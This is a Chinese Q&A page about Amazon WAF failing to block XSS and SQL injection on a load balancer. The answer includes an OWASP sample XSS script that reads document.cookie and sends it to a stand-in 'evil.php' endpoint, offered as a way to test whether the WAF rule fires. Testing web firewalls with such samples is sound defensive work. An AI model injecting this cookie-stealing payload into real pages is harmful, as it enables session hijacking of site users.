Amazon WAF 无法阻止 XSS 或 SQL 注入

Amazon WAF 无法阻止 XSS 或 SQL 注入

我尝试提交表单,<script>danger</script>但并未被阻止。我将 WAF 放在我的 ELB 上并进行了测试,以确保我有分析功能(如下)。

我究竟做错了什么?

这是我的 ACL:

访问控制列表

这是我的 XSS 和 SQL 规则:

SQL 注入规则

SQL注入条件

XSS 规则

XSS 预防条件

分析:(为了表明流量确实通过 LB 路由) 分析

答案1

下面是一个如何触发 XSS 规则的示例。这应该会自行触发您的规则(您可以通过将其指向您自己的 PHP 页面或其他 Web 位置来证明这一点),但这至少演示了一般原则。

<script type="text/javascript">
    var adr = '../evil.php?cakemonster=' + escape(document.cookie);
    document.write("<img src='" + adr + "' />");
</script>

以下 OWASP 文章提供了此示例和其他示例:

跨站点脚本 (XSS) - OWASP

相关内容